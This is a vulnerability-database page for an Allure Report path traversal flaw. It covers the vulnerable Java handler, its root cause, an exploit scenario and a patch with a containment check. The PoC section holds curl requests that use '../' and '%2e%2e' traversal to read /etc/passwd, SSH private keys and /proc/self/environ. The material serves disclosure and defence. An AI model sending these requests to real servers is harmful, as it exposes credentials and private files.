Allure Report CVE-2026-55846
MEDIUMSeverity by source
AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Default localhost binding warrants AV:L; no authentication on the HTTP server justifies PR:N; only file read is achievable so I:N and A:N.
Primary rating from GitHub Advisory.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Lifecycle Timeline
3DescriptionGitHub Advisory
Summary
The built-in HTTP server started by allure serve and allure open is vulnerable to path traversal. The server resolves request URI paths directly against the report directory without normalizing or validating that the resolved path stays within the report directory. An attacker who can reach the server can read any file accessible to the Allure process by sending a request containing ../ sequences.
Details
When allure serve or allure open is executed, Commands.setUpServer() creates an HTTP server with a handler that serves files from the report directory:
allure-commandline/src/main/java/io/qameta/allure/Commands.java:325-339
protected HttpServer setUpServer(final String host, final int port, final Path reportDirectory) throws IOException {
final HttpServer server = HttpServer
.create(new InetSocketAddress(Objects.isNull(host) ? "localhost" : host, port), 0);
server.createContext("/", exchange -> {
final Path resolve = reportDirectory.resolve("." + exchange.getRequestURI().getPath()); // line 330
if (Files.isDirectory(resolve)) {
serveFile(exchange, resolve.resolve("index.html"));
} else {
serveFile(exchange, resolve);
}
});
return server;
}On line 330, the handler constructs a file path by concatenating "." with the raw request URI path and resolving it against reportDirectory. For a request to /../../../etc/passwd:
exchange.getRequestURI().getPath()returns"/../../../etc/passwd"- String concatenation produces
"./../../../etc/passwd" reportDirectory.resolve("./../../../etc/passwd")resolves to e.g./tmp/allure-report/./../../../etc/passwd- The OS resolves this to
/etc/passwd
There is no call to .normalize() followed by a .startsWith(reportDirectory) containment check. The serveFile() method (line 341) reads and returns any regular file without further validation.
Additionally, URI.getPath() returns the percent-decoded path, so %2e%2e is decoded to .., enabling traversal via /%2e%2e/%2e%2e/etc/passwd which bypasses clients that normalize .. in raw form.
The server defaults to binding on localhost (line 327), which limits remote exploitation. However, the --host option allows users to bind to any interface (e.g., --host 0.0.0.0), which is commonly used in CI/CD and containerized environments. Even when bound to localhost, the vulnerability is exploitable by:
- Other local users on shared/multi-tenant systems
- DNS rebinding attacks from malicious web pages visited by the user
- Adjacent containers in CI/CD environments that share a network namespace
PoC
Step 1: Start the Allure server (simulating a typical CI/CD scenario with network binding):
allure serve ./test-results --host 0.0.0.0 --port 9090Step 2: Read /etc/passwd via path traversal:
curl --path-as-is 'http://localhost:9090/../../../etc/passwd'Step 3: Alternative using percent-encoded traversal (works even with clients that normalize ..):
curl 'http://localhost:9090/%2e%2e/%2e%2e/%2e%2e/etc/passwd'Step 4: Read sensitive application files (e.g., environment variables, SSH keys):
curl --path-as-is 'http://localhost:9090/../../../home/user/.ssh/id_rsa'
curl --path-as-is 'http://localhost:9090/../../../proc/self/environ'Each command returns the full contents of the requested file if readable by the Allure process.
Impact
An attacker who can reach the Allure HTTP server can read any file on the system that the Allure process has permissions to access. This includes:
- System credentials:
/etc/shadow(if running as root), SSH private keys, cloud provider credentials - Application secrets: Environment variables via
/proc/self/environ, configuration files, API keys - Source code and data: Any file on the filesystem accessible to the running user
In CI/CD environments where Allure is commonly used, this could expose build secrets, deployment credentials, and other sensitive CI/CD artifacts. The lack of authentication means any client that can reach the server's port can exploit this vulnerability.
Recommended Fix
Normalize the resolved path and verify it remains within the report directory before serving:
server.createContext("/", exchange -> {
final Path resolve = reportDirectory.resolve("." + exchange.getRequestURI().getPath()).normalize();
if (!resolve.startsWith(reportDirectory.normalize())) {
exchange.sendResponseHeaders(403, 0);
exchange.getResponseBody().close();
return;
}
if (Files.isDirectory(resolve)) {
serveFile(exchange, resolve.resolve("index.html"));
} else {
serveFile(exchange, resolve);
}
});The .normalize() call collapses .. sequences, and the .startsWith() check ensures the resolved path is still within the report directory. Requests attempting traversal receive a 403 Forbidden response.
AnalysisAI
Path traversal in Allure Report's built-in HTTP server (allure-commandline <= 2.38.1) allows any client that can reach the server port to read arbitrary files accessible to the Allure process. The vulnerability exists in Commands.setUpServer() where request URI paths are resolved against the report directory without normalization or containment checks, and Java's URI.getPath() additionally percent-decodes sequences like %2e%2e to .., bypassing client-side normalization. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires that the Allure HTTP server is actively running (via allure serve or allure open) and reachable by the attacker. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The NVD-assigned CVSS vector CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N scores 6.2 and reflects the default localhost binding, which materially limits network-based exploitation. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | A CI/CD job on a shared runner starts Allure with allure serve ./test-results --host 0.0.0.0 --port 9090 to expose results for review. A co-located process or adjacent container on the same network sends curl --path-as-is 'http://runner-host:9090/../../../home/ci/.ssh/id_rsa', retrieving the CI runner's SSH private key in a single unauthenticated request. … |
| Remediation | Upgrade io.qameta.allure:allure-commandline to version 2.39.0 or later, which applies .normalize() to the resolved path and enforces a .startsWith() containment check before serving any file, per the vendor advisory at https://github.com/allure-framework/allure2/security/advisories/GHSA-82cg-3hv7-74gc. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
Oracle Java SE 7 Update 6 and earlier contains multiple sandbox bypass vulnerabilities via the ClassFinder and forName m
Remote code execution in IBM Sterling B2B Integrator, Sterling Integrator, and Tivoli Common Reporting allows unauthenti
Java Runtime Environment sandbox bypass via incorrect image channel verification in 2D component allows remote unauthent
Oracle Java SE JDK/JRE 7 and 6 Update 27 and earlier allows remote code execution with complete system compromise throug
JBoss Seam 2 in Red Hat JBoss EAP 4.3.0 fails to sanitize JBoss Expression Language inputs, allowing remote attackers to
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 update 4 and earlier, 6 up
Multiple vulnerabilities in Oracle Java 7 before Update 11 allow remote attackers to execute arbitrary code by (1) using
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 2 and earlier, 6 Up
The WLS Security component in Oracle WebLogic Server 10.3.6.0, 12.1.2.0, 12.1.3.0, and 12.2.1.0 allows remote attackers
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 7 and earlier allow
Remote unauthenticated attackers can execute arbitrary code on Adobe ColdFusion servers through Java deserialization fla
The ExceptionDelegator component in Apache Struts before 2.2.3.1 interprets parameter values as OGNL expressions during
Same weakness CWE-22 – Path Traversal
View allSame technique Path Traversal
View allShare
External POC / Exploit Code
Leaving vuln.today
GHSA-82cg-3hv7-74gc